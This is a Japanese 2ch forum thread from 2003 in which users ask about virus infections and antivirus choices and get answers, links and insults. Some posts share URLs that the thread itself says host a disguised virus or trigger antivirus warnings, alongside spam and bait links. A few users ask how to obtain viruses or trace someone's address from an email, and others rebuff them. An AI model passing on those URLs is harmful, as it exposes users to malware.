     ∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ( ´∀`)/<先生!こんなのがありました!
 _ / /   /   \___________
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
 ||  || ̄ ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/

508 :名無しさん@お腹いっぱい。:03/03/23 23:25
     _____
   /::::::::::::::::::::::::::\
  /::::::::::::::::::::::::::::::::::::::\
  |:::::::::::::::::|_|_|_|_|
  |;;;;;;;;;;ノ   \,, ,,/ ヽ
  |::( 6  ー─◎─◎ )     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |ノ  (∵∴ ( o o)∴)    /このウィルスは何で
/|   <  ∵   3 ∵>  < どうやって駆除すればいいのですか?
::::::\  ヽ        ノ\   \ おしえろよクズども
:::::::::::::\_____ノ:::::::::::\  \___________


509 :名無しさん@お腹いっぱい。:03/03/24 00:09
>>508
マルチ厨必死だな。もうちょっと大人になりましょうね

510 :名無しさん@お腹いっぱい。:03/03/24 00:49
>>509
マルチ厨のせいでスレが荒れております。
悪化するのでなるべく煽るんじゃねえよボケ!!

511 :名無しさん@お腹いっぱい。:03/03/24 00:51
ていうかマルチ厨ってどっち?
「マルチした奴は懲罰的に無視」って思ってる方でしょ?

512 :名無しさん@お腹いっぱい。:03/03/24 02:32
初心者板、もしくは厨房板へどーぞ

513 :名無しさん@お腹いっぱい。:03/03/24 03:48
荒れてると思ったらずっと前から荒れてたのね。よく9まで続いたな。

514 :名無しさん@お腹いっぱい。:03/03/24 11:18
>>473
 遅れすだけど、どうせ、こいつはネカマだな。春休み入りたての厨房が家族のパソコンでエロサイト巡回したんだろな。
俺も昔、その罠にはまって、リア厨の俺はホントあせったよ。
できるインターネット呼んで直ったけど・・・。
しっかり、ダイヤルアップ先が変わってて2万円とられてたんだよね・・・・。
なつかしい・・。

515 :名無しさん@お腹いっぱい。:03/03/24 11:26

次の質問・情報どうぞ。
 ↓ ↓ ↓

516 :名無しさん@お腹いっぱい。:03/03/24 13:07
http://www.kogalu.com/sou/logon/omanko.htmってところに好奇心ではいったら、
ホームが強制的に↑になっちゃうんですが、だれか直し方わかりますか?

517 :名無しさん@お腹いっぱい。:03/03/24 13:08
>>516
エロサイト見たら・・・助けてください!Part11
http://pc2.2ch.net/test/read.cgi/pcqa/1047359426/

518 :名無しさん@お腹いっぱい。:03/03/24 13:54
>>517さんありがとうございます!

519 :名無しさん@お腹いっぱい。:03/03/24 14:38
Norton AntiVirusとNorton Internet Securityって何が違うんだろう・・・・

520 :名無しさん@お腹いっぱい。:03/03/24 14:39
あげてしもたスマソ(-_-; )ゞ

521 :名無しさん@お腹いっぱい。:03/03/24 14:41
あぅあ・・・しかも誤爆。逝ってきます

522 :名無しさん@お腹いっぱい。:03/03/24 16:49
1月くらいに韓国でネット障害とか起こしたウイルス
ってなんて名前だっけ?

523 :名無しさん@お腹いっぱい。:03/03/24 17:09
>>522
SQLExp(SQLP,Slammer,1434番ポート)スレッド 1
http://pc.2ch.net/test/read.cgi/sec/1043525470/

524 :名無しさん@お腹いっぱい。:03/03/24 22:39
age

525 :名無しさん@お腹いっぱい。:03/03/24 23:23
same

526 :名無しさん@お腹いっぱい。:03/03/25 02:39
○○○○ こんな電波はありませんか? ○○○○

荒らしなどのコピペで、厨房、工房、消防、
このような人たちをコピペで煽りを行えるコピペは無いでしょうか。
出来れば制限時間内に5レスくらい返ってくる、みたいな含蓄のあるもの。
出来ればレベルの高いものをお願いします。
荒らしと書きましたが、形式は全く問わないです。
著作権、版権も問わないです。

お願いします。

527 :名無しさん@お腹いっぱい。:03/03/25 03:03
>>526
どっか逝け。

528 :名無しさん@お腹いっぱい。:03/03/25 06:55
>>526
ショレダ!

529 :名無しさん@お腹いっぱい。:03/03/25 14:44
age

530 :名無しさん@お腹いっぱい。:03/03/25 17:23
JS_KOWAIAなるものに感染しました。
一応駆除しましたが、なにか影響があるでしょうか?
どうか教えてください。

531 :名無しさん@お腹いっぱい。:03/03/25 17:30
>>530
検出したウィルス対策製品のサイトで情報を得るのが基本。
検出名が分かっているなら、検索すれば済むこと。

532 :名無しさん@お腹いっぱい。:03/03/25 17:30
それがデータベースになかったんです

533 :名無しさん@お腹いっぱい。:03/03/25 17:37
じゃ、どうしてJS_KOWAIAだと分かるのか。
何で検出したのか、感染経路は、OS等環境は?
情報の小出しは(ry

534 :名無しさん@お腹いっぱい。:03/03/25 18:07
(´-`).。oO(この手の質問って、詳細を突っ込まれると居なくなっちゃうね。何が目的の質問なんだろう…)

535 :名無しさん@お腹いっぱい。:03/03/25 18:15
感染したんじゃなくて、それで何かをしようとしていると思われ。

536 :名無しさん@お腹いっぱい。:03/03/25 19:52
>>535
なるほど・・・・

537 :名無しさん@お腹いっぱい。:03/03/25 20:30
>>534
初心者には詳細に出てきた単語の意味すら分からないからでしょ。
んもぅ・・そんなこと分かってて見下して楽しんでるくせに!w

538 :名無しさん@お腹いっぱい。:03/03/25 20:57
>>537
糸のない釣りはできない。

539 :名無しさん@お腹いっぱい。:03/03/26 08:17
W32.HLLW.Lovgate.G@mm
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.lovgate.g@mm.html
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.lovgate.g@mm.html
Backdoor.OptixPro.12.b
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.optixpro.12.b.html


540 :名無しさん@お腹いっぱい。:03/03/26 11:08
age

541 :名無しさん@お腹いっぱい。:03/03/26 12:00
トロイを発見したんですよ。オンラインスキャンで。
そしたらどうすればいいんでしょうか?普通に削除
すれば解決するのでしょうか?

542 :名無しさん@お腹いっぱい。:03/03/26 15:09
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELWIN.D
これに引っかかったんですけど、再インストールしか
対処方法はないのでしょうか・・・?

543 ::03/03/26 15:13
だれかウィルスを入手できる方法おしえてけれ

544 :名無しさん@お腹いっぱい。:03/03/26 15:14
>>542
MXばっか、やってんな。ハゲ。残念ながらてめーのHDDはご臨終だ。ざまぁねぇな。


545 :名無しさん@お腹いっぱい。:03/03/26 15:37
ウィルス対策にアンチウィルスソフトを入れるか、それともNTTのフレッツ・セーフティを導入するか迷っています。
皆さんのアドバイスを聞かせていただけないでしょうか?

http://flets.com/safety/

546 :名無しさん@お腹いっぱい。:03/03/26 15:42
ピュアAU板をうろついていて踏んだURLでノートンが反応、警告のウインドが開きました。
ウィルス名 EICAR Test Stringです。シマンテックのページで検索したのですが、対処方法が見つかりません。
(別の所で調べたら古いタイプ?)どのように駆除したらよいでしょうか?
ちなみにそのウィルスのURLは ttp://www.eicar.org/download/eicar.com.txt です。
どなたかお願いします。


547 :名無しさん@お腹いっぱい。:03/03/26 16:35
>>546
釣りはやめてね。
もしほんとに釣りでないのならEICARでググってね。

548 :546:03/03/26 16:48
>547
すいません。当方初心者の為、本当にわかりませんでした。
検索エンジンで調べたら、ウィルスチェッカーを試すものだとわかりました。
そういう擬似ウィルスがあるとはしらなかったもので。シマンテックに載ってないしパニくってしまって。お騒がせしました。

549 :名無しさん@お腹いっぱい。:03/03/26 18:00
>>545
WAN経由ならフレッツ・セーフティで防げるが、
フロッピーやCD/DVD/MO等で他人からもらったファイルがウィルスに感染していた場合
アンチウィルスソフト常駐なら反応するけど、フレッツ・セーフティだと防げないね。
WordやExcelのファイルのやりとりで感染することも多い。
そのあたりを自分で考えて決めてくらはい。

550 :545:03/03/26 18:56
>>549
なるほど!ウィルスはネットだけからじゃないですよね
う〜む、危ないところだった。ソフトを入れることにします
ありがとうございました


551 :名無しさん@お腹いっぱい。:03/03/26 19:00
おまいら、>>539 の Lovgateって、はやってませんか?
Sex in Office.rm.exe とか、いい名前ですねぇ。

552 :名無しさん@お腹いっぱい。:03/03/26 23:45
あげ

553 :名無しさん@お腹いっぱい。:03/03/27 08:34
age

554 :名無しさん@お腹いっぱい。:03/03/27 09:41
>>545
結局ウイルス対策ソフトのほうが、安くすまないか?


555 :名無しさん@お腹いっぱい。:03/03/27 13:19
>>554
結局これを買うかレンタルする必要があるんでしょ。
http://www.ntt-east.co.jp/ced/goods/gatelock/

556 :名無しさん@お腹いっぱい。:03/03/27 13:42
>>555
結局メールの添付ファイルしか検知されないよね。
ファイヤーウオールは設定だけ間違えなければ、
ソフトでも十分対応できるよね。
ただ、NT系のOSじゃないと設定の仕方によっては、
アクセスが集中したときにフリーズするかも!!


557 :m:03/03/27 14:02
http://jsweb.muvc.net/index.html
★☆★☆★☆★☆★☆★☆★☆★☆

558 :名無しさん@お腹いっぱい。:03/03/27 14:08
すいません ド素人に助言をください

ウイルスバスター か ノートン どっちを買うか迷ってます

くわしい方の 意見を 聞かしてください。
 

559 :名無しさん@お腹いっぱい。:03/03/27 14:49
>>558
このあたり読んで自分で判断しろ。
【2003対決】バスターVSノートン ウイルス2個目
http://pc.2ch.net/test/read.cgi/sec/1041333463/
バスターVSノートン
http://pc.2ch.net/test/read.cgi/sec/1005050509/
【ノートン】インターネットセキュリティ Ver.21【2003】
http://pc.2ch.net/test/read.cgi/sec/1048433756/l50
【不具合】ウイルスバスター2003Part8【未解決】
http://pc.2ch.net/test/read.cgi/sec/1047794591/l50

560 :名無しさん@お腹いっぱい。:03/03/27 17:16
age

561 :名無しさん@お腹いっぱい。:03/03/27 17:48
はじめまして。
最近ウイルス感染してしまった初心者です。
ウイルス名は「BKDR_DELODER.A」です。

事の顛末ですが、普段はウイルスバスター2003を常駐していましたが、win2000をリカバリーしてアップデートする際、DLの効率を高めるために敢えて外して行いました。アップデート終了後にバスターをインストールした際、感染が発覚しました。

バスターで駆除出来なかったため、同ソフトにて隔離・削除しましたが、それでも怖かったためもう一度リカバリーを行いました。
今度はバスターをインストールした後でアップデートを行いました。

皆さんに質問なんですが、現況で心配することはないのでしょうか?
またハッキングされてウイルスが送り込まれる可能性はあるのでしょうか?
対応法等ありましたら、是非教えて頂きたいのです。
バスターのファイアーウォールログを見たら、約2分刻みでログが増えているのでとても心配しています。

被害ですが、確認しているのはメールデータが紛失してしまった事です。
それとマイコンピュータから各ドライブの共有設定を「共有しない」に設定しても、再起動後には「共有する」に戻ってしまうことです(仕様かも
しれませんが)。
他にも被害があるかもしれませんが、私が分かる範囲ではこれだけです。

システムですが、cドライブに98でdドライブにデータ、eドライブに2000をインストールしていて、ほとんど(ネット接続は全て)2000を使用しています。
リカバリーを行ったのは2000のみで、98は行っていません。
ADSL(yahoo.BB)接続で、ルーターは取り付けていません。
ファイアーウォールソフトはバスター2003とリカバリー後にゾーンアラームをインストールしました。

初心者で長文になり誠に恐縮なんですが、皆さん宜しくお願い致します。


562 :名無しさん@お腹いっぱい。:03/03/27 17:58
>>561
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.deloder.html
http://www.nai.com/japan/virusinfo/virD.asp?v=W32/Deloder.worm

563 :561:03/03/27 19:47
>>562さん

ありがとうございます。
でもすいません、それは既に確認済みなんです^^;
当然感染直後に駆け込みましたよ^^;

確かに隔離・駆除は出来ましたが、その後の設定というか
対処法が知りたかったのです(上記の質問を含めて)。

宜しくお願いします。

564 :名無しさん@お腹いっぱい。:03/03/27 19:49
■NGワード

・質問時に使用するのは好ましくない言葉。

「初心者」
免罪符にはならない。「初心者」であることを理由にしないのならば許容範囲。
「初心者」なりにでも節度を持った行動はできるはず。

「初歩的」
そういう自覚があるのならもう少し自分で情報を集めたり試してみて欲しい。
うわべだけ丁寧に「動きません」「分かりません」とだけ言われても答えようが無い。

「探しているのですが見つかりません」
それは探し方が足りないか、下手なのか…。
それにしてもなぜそれが存在しているのを知っているのだろう?
友達から聞いたのかは知らないが、その情報を得たところに尋ねるのが一番。
そうでなければ、無いと考えるのが妥当。

「それくらいのことは分かってます」
あなたが詳しい状況を書いていないのだから、可能性があるものを挙げたのだろう。
まず自分の説明不足を理解するべき。
回答者も行間を読む必要は無い。逆に質問文に質問しよう。逆切れされない程度にな!

「誰も分からないのですか?」
そうです。あなたの質問は理解できません。

はじめてではないのに「はじめまして」?
「いつもお世話になっております」仕事なの?
「様」付けするのはいかがなものか。そんなに卑屈にならなくても…。
「Alphabet(アルファベット)全角主義」は見にくい。

ttp://www5e.biglobe.ne.jp/~sdp/software/oshietekun.html

565 :名無しさん@お腹いっぱい。:03/03/27 20:07
>>564
なるほろー

566 :551:03/03/28 03:42
>>551
これで騒いでるのって、うちの会社だけですか
恥ずかしいのでsage

567 :名無しさん@お腹いっぱい。:03/03/28 10:25
>>566.
がんがれ。社内のミスを社外に出さないのがプロだ。
社内で騒いでも、それで解決できたのなら何も気にしない方が良いと思う。
次に、同じ過ちを繰り返さないようにさえすれば。
私も他にはいえない恥ずかしい失態なら何度か目にしてるからw
ただ、これで大騒ぎするのはどうかと、、、
少し気をつけないと亜種が出たときに対応できないと大変なことになるよ。
今回のは拡散ワームの単調なやつだから良いけど、、、。

568 :名無しさん@お腹いっぱい。:03/03/28 14:19
age

569 :名無しさん@お腹いっぱい。:03/03/28 16:05
質問です。
http://thebbs.jp/hack/1038560618.html
ここの掲示板を開いたらウイルス警告がでました。
しかしウイルスには感染してないみたいです。
ソースのぞこうと思ったら見れませんでした。
どのような仕組みになてるのかわかる方いますか?

570 :名無しさん@お腹いっぱい。:03/03/28 16:06
http://homepage3.nifty.com/digikei/sample/sample.html

571 :名無しさん@お腹いっぱい。:03/03/28 16:37
>>569
この板では鑑定はやらない。
勇気がなくて見られない画像解説スレpart323http://ex.2ch.net/test/read.cgi/entrance/1048763717/l50へ。

ソースにウィルスのスクリプトが書かれているため、アンチウィルスソフトが
遮断しているので見られないと思われる。見たけりゃアンチウィルスソフトを
停止させて自己責任でどうぞ。そういうURIを直リンで書き込むのは見識を疑う。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.network.e.html
掲示板の仕様によっては誤反応の可能性もある。
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/


572 :chesire-cat ◆CATBCJABLA :03/03/28 18:54
>>561
管理共有。
http://www.microsoft.com/japan/enable/training/kblight/T005/8/18.htm
http://www.ipa.go.jp/security/fy10/contents/crack/research/windows2k/2-18.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;314984

おまけ1 - リモートレジストリ
http://www.microsoft.com/japan/technet/security/tools/chklist/w2kprocl.asp
http://www.atmarkit.co.jp/fwin2k/operation/iissecurity/iissecurity_05.html

おまけその2 - 匿名ユーザー(2だとブラウジングのマスタブラウザになれなくなるんで注意)
http://www.ipa.go.jp/security/fy10/contents/crack/research/windowsnt/19.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP246261

おまけその3 - Port445関連
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20021129/3/



573 :名無しさん@お腹いっぱい。:03/03/28 19:57
age

574 :名無しさん@お腹いっぱい。:03/03/28 22:17
age

575 :561:03/03/28 23:01
>>572
ありがとうございます^^

早速拝見したところ、正直勉強不足なためか読解力がないのか、理解出来ない
点も多々あります^^;
が、これだけ多くの情報を提示して頂いた>>572さんの行為を無駄にしないため
にも、そして自分自身を今後守っていくためにも勉強して理解していく努力を
していこうと思います。

本当にありがとうございました^^

576 :名無しさん@お腹いっぱい。:03/03/28 23:02
当方のOS、窓XP家版使用。
買ってきたVAIOをネットに繋げて数日でXPにかかる筈のない
ウイルスW95.spacesに汚染されてしまいました。
各種ウイルス退治系の会社HPを調べた結果XPには被害が無い
そうなのですが、買って直ぐだからなんか気持ち悪いです。
DOS環境があるOSじゃないから根絶やしに駆除できないんだよね。

何か方法があったら駆除を教えてください。

577 :名無しさん@お腹いっぱい。:03/03/28 23:56
>>576
>>1

578 :名無しさん@お腹いっぱい。:03/03/28 23:58
http://www.domo2.net/bbs/image/1045173790.gif
最新のウイルス発見! 踏んでみろって!

579 :名無しさん@お腹いっぱい。:03/03/29 00:57
  _, ._
( ゚ Д゚)  ・・・

580 :551,566:03/03/29 08:28
>>567
>がんがれ。
ありがトン。ちょろりとは社外に出てしまったようではあるんですが...。
それはともかく、うちの***部はこんなんある度に過剰反応、
しかもちょっとピントがずれてる事が多くて、一般社員にかえって
迷惑を掛けてるとしか思えない... ウィルス以上に困ったもんです。
ほんとに恥ずかしいのでさげ

581 :名無しさん@お腹いっぱい。:03/03/29 16:47
ここは日記ですね

582 :名無しさん@お腹いっぱい。:03/03/29 16:53
●質問したこと以外のツッコミがうざいんだけど。
とりあえずものを尋ねるだけのうちは「はい」と言って従っておくのが
吉だ。まだ君には反論できるだけの知識がないのだから。

●ショシンシャがうざいんですけど。
みんなはじめは初心者だ。わかることなら答えてくれ。
ただし「お人好しの回答者は馬鹿をつけあがらせる」ことをお忘れなく

583 ::03/03/29 19:51
ウィルスが簡単に手にはいる方法あるそうだがおしえてくれ。

584 :名無しさん@お腹いっぱい。:03/03/29 20:20
板のトップ読んで帰れ。

585 :名無しさん@お腹いっぱい。:03/03/29 23:25
age

586 :名無しさん@お腹いっぱい。:03/03/30 02:31
質問です。
同じ日にウイルスメールが10通近く送られて来ました。
アドレスを偽るタイプのウイルスらしく、OEの「差出人」の
所に表示されている名前は全て違いました。
メールヘッダーの「Received」の部分に表示されている
ドメインとIPは全て同じでした。これは一人の人から送られて
来ていると判断して良いのでしょうか? この部分まで偽る
ウイルスってあるのでしょうか?

587 :名無しさん@お腹いっぱい。:03/03/30 04:56
それを聞いてどうするつもりやら

588 :名無しさん@お腹いっぱい。:03/03/30 05:29
最近REDLOFが盛り返してきたね。一時期治まりつつあったかと思いきや。

589 :580:03/03/30 10:47
>>581
てゆーか、社内でちょっとした祭りになっているので、
どんなものかと思ってここに来てみたんですが、
全然はやってないってことですね。了解しました。
スレ汚しさげ。

590 :586:03/03/30 13:06
>587
あまり見ないドメインだったので、アドレス張の中で
そのドメインを持っている人に、「万が一ということも
あるのでウイルスチェックしてもらえませんか?」と
メールを出そうと思ったんですが。
3週間毎日くらい続いてるんですよ。ウイルスメール。

591 :名無しさん@お腹いっぱい。:03/03/30 14:46
質問です。
Googleのページの文字が全部「□□□・・・」と表示されます。
ウイルスかと思ってTrend Micro に行ってみたら同じ用にほと
んどの文字が□になっていました。
今のところ3箇所でこのような症状が表れました。
画面のスクロールもおかしくなったりします。
これってウイルスなんでしょうか?

592 :名無しさん@お腹いっぱい。:03/03/30 14:59
>>586 いいと思われ。一応ISPとかも調べておいて
しつこくくるようだったらISPに報告とかね。

593 :586:03/03/30 17:51
>592
ありがとうございます。助かりました。
って言ってるうちにまた来ました……。
急いで対策を講じます。
本当にありがとうございました。

594 :名無しさん@お腹いっぱい。:03/03/30 22:37
知らない人から添付ファイル付きのメールが送られてきて、
そのまま、メールを開かないように削除したいんですけど、
(ホットメールの受信トレイのページでです)
チェックを入れて、削除を押せば、メールを開かないまま削除できるのでしょうか?
どなたか教えてください。
宜しくお願いします。


595 :名無しさん@お腹いっぱい。:03/03/30 22:49
>>594
自分宛にテストメール送って、それで試してみりゃいいんではないのかよーこよこはまよこすか

596 :594:03/03/30 23:03
>>595
そっか!ありがとうございます!
早速やってみました。
開かないまま削除できたのでめでたしめでたしでした!
なんだか怖くて落ち着かなかったので助かりました!

597 :c:03/03/30 23:04
★みんなの情報局★みんなのリンク集★ココ最高★
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
http://www.pink-angel.jp/betu/linkvp2/linkvp.html

598 :591:03/03/31 03:13
解決しました。

599 :名無しさん@お腹いっぱい。:03/03/31 08:12
age

600 :名無しさん@お腹いっぱい。:03/03/31 11:18
>>598
原因は何だったの?

601 :名無しさん@お腹いっぱい。:03/03/31 14:10
age

602 :598:03/03/31 21:46
>>600
ウインドウズのフォントキャッシュが壊れただけでした。

603 :名無しさん@お腹いっぱい。:03/03/31 22:03
>>229とほぼ同じ状況に陥り、ネットで調べたり
ここを見た結果BKDR_DELODER.Aだろうという事がわかりました。
長くなってしまいますがご勘弁を。
一応フリーのファイヤーウォールoutpostを入れてて情報は外部には漏れてないと思います。(自信はあまりないかも)
OSは2000SP3 IE6 CATVです。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DELODER.A
を見て対処しました(したつもりです)

で、収まったかと思ったら、>>229のようにまた現れました。
で、また同じように対処しました。それから数日たった今は何もありません。

で、今日友人がヤフーBBに開通しました。
んで、早速ヤフーメッセンジャーで話をしして
とりあえずwindows updateしとこうということになり、彼はまずIE6をダウンして再起動して戻ってきました。
すると再起動したあとに
WinVNC:Current User Properties
というダイアログが出たそうなんです。
で、調べたところ彼も感染してたようです。

604 :603:03/03/31 22:03
彼がネットに繋いでからしたことは
yahooへ行く

vectorへいってVBランタイムを落としてインスト

http://www.studio-radish.com/tea/netspeed/で速度測定

FF11のベンチマークプログラムを落とす

自分とメッセンジャーで話す

ファイルを転送しようとするが向こうがファイヤーウォールの中にいるためかできない

自分がhttpd(1.42h)でwebサーバーたててそこからDLしてもらう

IE6をダウンして再起動

です。
ちなみにhttpdによるサーバはいつも立てている訳ではありません。
友人にファイルを送る手段してごく一時的に使います。
このときoutpostの設定はhttpdの通信はすべて許可、にしていました。

これは自分がウィルスに感染したままだった為だと思うのですが、
どうすれば消えてくれるのでしょうか?上のURLの通りにやったつもりで、
消えているように見えるのですが・・・・

605 :603:03/03/31 22:13
あ、彼のOSも2000で、インストしたばかりです。
ネットに繋いでアプデトした矢先のことでした。


606 :名無しさん@お腹いっぱい。:03/04/01 02:47
Winタスクマネージャーのプロセスを見てみるとsvchost.exeが5個も動いているのですが、
これはやはりおかしいですよね?ユーザーはSYSTEMで3つ、NETWORK SERVICEとLOCAL SERVICEでひとつずつです。


607 :名無しさん@お腹いっぱい。:03/04/01 05:06
メールアドレスから住所、電話番号割り出したいのですが。

何卒何卒お願いします。緊急です。
本当に申し訳ないのですがお願いします。



608 :cheshire-cat ◆CATBCJABLA :03/04/01 05:52
>>603
設定不良のパソがPersonal Fire Wallで保護されていたのに、それを外したから感染したかと。
うぃ。
http://pc.2ch.net/test/read.cgi/sec/1045816526/572



609 :cheshire-cat ◆CATBCJABLA :03/04/01 06:08
>>606
Svchostって「Service Host」。他のサービスを起動させるためのホストプロセス。
Te-TecnorogyってHPに良解説があったけど、閉鎖されてまったのねん。

http://homepage2.nifty.com/winfaq/wxp/network.html#1326
http://support.microsoft.com/default.aspx?scid=kb;JA;q250320
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q314056
http://homepage2.nifty.com/winfaq/wxp/trouble.html#1016

もちろん、Svchost.exeってファイルを作成しるウイルスもあります。

610 :名無しさん@お腹いっぱい。:03/04/01 08:55
>>607
お前のメアドと住所と電話番号を晒してごらん。

611 :名無しさん@お腹いっぱい。:03/04/01 09:54
少し前の話だけど
知人のアドレスでKLEZのファイル付きメールが来て
知らずにダウンロードして感染してしまった。
でもその知人の所にも、知人が今までメールをやり取りした人にも
誰1人ウイルスメール(感染後に自動的にばら撒かれる感染メール)
が来てないらしい。
なんかこれ変じゃないですか?もしかして知人が?と
疑ってしまったらマズイですかね?
しばらくして、掲示板で言われもない中傷受けたし。


612 :bloom:03/04/01 10:06
http://www.agemasukudasai.com/bloom/

613 :名無しさん@お腹いっぱい。:03/04/01 10:20
trickler_4010.ex_ってファイルあったんですけど。
これはヤバいんでしょうか?

614 :名無しさん@お腹いっぱい。:03/04/01 12:08
こういう人にどう対処したらよいでしょう?

http://hpcgi3.nifty.com/yasuoka/ff10-2_no1/wforum.cgi?no=1228&reno=1226&oya=466&mode=msgview&page=30

615 :名無しさん@お腹いっぱい。:03/04/01 12:21
>>613
この板では鑑定はやらないし、ファイル名だけで危険かどうか分かりません。
http://ex.2ch.net/test/read.cgi/entrance/1049084572/l50か、
ダウソ板http://tmp.2ch.net/download/へ。

>>614
マルチポスト、荒らし依頼。氏ね。
http://pc.2ch.net/test/read.cgi/sec/1000252846/114

616 :名無しさん@お腹いっぱい。:03/04/01 15:51
age

617 :名無しさん@お腹いっぱい。:03/04/01 15:56
すげ〜
http://homepage3.nifty.com/digikei/sample/sample.html

618 :名無しさん@お腹いっぱい。:03/04/01 18:04
Redlof.Aってやばいですか?

619 :名無しさん@お腹いっぱい。:03/04/01 18:18
>>618
検索&過去ログ参照

620 :名無しさん@お腹いっぱい。:03/04/01 21:50
おまえら全員死ね

621 :名無しさん@お腹いっぱい。:03/04/01 21:50
VBS_REDLOF.Aとやらのウィルスにやられまくってる。
ファイルを開いてもまっしろや。 検索したらでるんやけど;
ウィルスバスターとか系で駆除できまつ?



622 :名無しさん@お腹いっぱい。:03/04/01 22:14
>>621
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A

623 :名無しさん@お腹いっぱい。:03/04/01 22:34
レジストリエディタ???

624 :名無しさん@お腹いっぱい。:03/04/02 00:40
>>623
レジストリ・・・

625 :名無しさん@お腹いっぱい。:03/04/02 12:12
最近140KB前後のやたら重いメールが来るんですが、これって何ですか?
添付ファイルは無いです。題名はどれも英文です。
一度、ケータイからそれを空けたら中身真っ白でした。
教えて下さい。
一日に5件以上入ってきて困ってます。




626 :名無しさん@お腹いっぱい。:03/04/02 12:36
>>625
>ウィルスに関わる話題・質問はこちらに
>ウィルスかどうかはウィルススキャンして判断してください。

627 :名無しさん@お腹いっぱい。:03/04/02 20:13
>>625
ヘッダが140KBのメールとか


628 :名無しさん@お腹いっぱい。:03/04/02 21:16
age

629 :名無しさん@お腹いっぱい。:03/04/02 21:21
これウィルスかどうか分からないんだけど、
パソコン起動したらデスクトップの左下に
必ず小さいxxxsexって書かれたタイトルバー
だけのウィンドウが出ます。

で、IE6を起動すると 必ずロリータリンクページ
が出て、ホームぺージ の設定を消去しても、
次の起動にはまた必ず ロリータページが
ホームページになってます。

で、偶にlovesexっていう ページが出て、変な二つの
プログラムをダウンロード しろと出ます。

で、あるページにリンクすると、3回に一回の割合で
変なサーチエンジンの ページに飛びます。

一体何なのでしょうかね?


630 :名無しさん@お腹いっぱい。:03/04/02 21:31
毎回起動時にAVGから警告で
virus
Trojan horse MusicSearch
と表示されますが
スキャンにかけても何も反応しません。
オンラインスキャンも無反応でした。
OSはXPでWindowsUPDATEは最新です。
見つかる場所は
E:\Documents and Settings\Administrator\Local Settings\Temp
で、実行ファイルなのですがそのようなファイルは隠しファイルにすらありませんでした。

海外では似た事例が起きているようですが
検索しても今ひとつ解決策が見つかりません。
どうか助けて下さい。

631 :名無しさん@お腹いっぱい。:03/04/02 22:39
トロイって画像等をダウンロードしただけで感染しますか?
それとも実行しなければ問題ないですか?
ブラクラ(グロ)間違ってDLしちゃったんです。

632 :名無しさん@お腹いっぱい。:03/04/02 23:07
すみません、お力をお借りします。当方WinMe/IE6/ウィルスバスターです。
tp://www.geocities.co.jp/Bookend-Yasunari/8114/niki.txt
上のアドレスを踏んでしまい、妙なテキストファイルが出てきました。
鑑定スレでは

764 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 21:12 ID:???
>>752
これは、txtは擬装で、本当はzipファイルです。
ただし、解凍しても出てくるのはウイルスですから、解凍しない方が良いでしょぅ。
イキストファイルだと思って踏んでいるのであれば、ウイルスに感染する事はありません。

と聞き、急いで全ドライブスキャンを実行しました。
結果、「ZK_900-C」と「___」というふたつのファイルが検出され、駆除されたと出ました。
検出場所はどちらもインターネットテンポラリフォルダ内で、念のためスキャンが終わったあと
キャッシュクリアもしましたが、一つフォルダが残っているようなのです。
また、「ZK_900-C」の方は「chopin\CHOPIN.COM」という よくわからないドライブ名が検索ログに残っています。

633 :名無しさん@お腹いっぱい。:03/04/02 23:07
107 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 22:06 ID:???
>>106
NPox900というウイルスだと、ノートンアンチウイルスは警告しました。

と聞いたのでトレンドマイクロ、シマンテックのウィルスデータベースで「ZK_900-C」「NPox900」双方を検索しましたが
情報はヒットせず、不安でたまりません。

110 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 22:11 ID:???
>>109
申し訳ありませんが、ウイルスについては当方はくわしくないので分かりません。

という事なのでそれ以上立ち入った事を聞くわけにもいかず、こちらに力を借りに来ました。

質問したいことは
・「ZK_900-C」「NPox900」というのはどんなウィルスなのか
・フォルダが残ってる理由(推測でいいです)
・この状況で安心していて大丈夫なのか
・「chopin\CHOPIN.COM」というドライブ名について
以上です。よろしくお願いします。長くなってしまいすみませんでした。

634 :名無しさん@お腹いっぱい。:03/04/02 23:08
先にぼるじょあスレに行ったら「ここはネタスレですから」ということで
こちらに来ました。ごめんなさい…

635 :名無しさん@お腹いっぱい。:03/04/02 23:12
質問はageで。

636 :名無しさん@お腹いっぱい。:03/04/02 23:21
>>632-634
さっき質問したぼるじょあスレでちょっとレスついてたよ
マルチっていえばマルチだけど、ちゃんと誘導されてるし
まぁいいかなと思う、しかもぼるじょあだし・・・

ぼるじょあ(・3・)質問箱 セキュ板出張所3
http://pc.2ch.net/test/read.cgi/sec/1046969359/893

トレンドマイクロのオンラインスキャンでもしてみればどうかな?
>>1からちょっと読んでみてちょ

637 :名無しさん@お腹いっぱい。:03/04/02 23:36
>>636
わかりました…再びごめんなさい。

638 :名無しさん@お腹いっぱい。:03/04/03 04:07
>>637
これじゃない?
ttp://www.nai.com/japan/virusinfo/virNdos.asp?v=NPox
ttp://www.nai.com/japan/virusinfo/virXYZdos.asp?v=ZK900

639 :638:03/04/03 04:10
あ、ごめん
>>636のスレで既出みたいだね

640 :名無しさん@お腹いっぱい。:03/04/03 09:08
age

641 :名無しさん@お腹いっぱい。:03/04/03 13:20
age

642 :HLLW.Cult:03/04/03 15:50
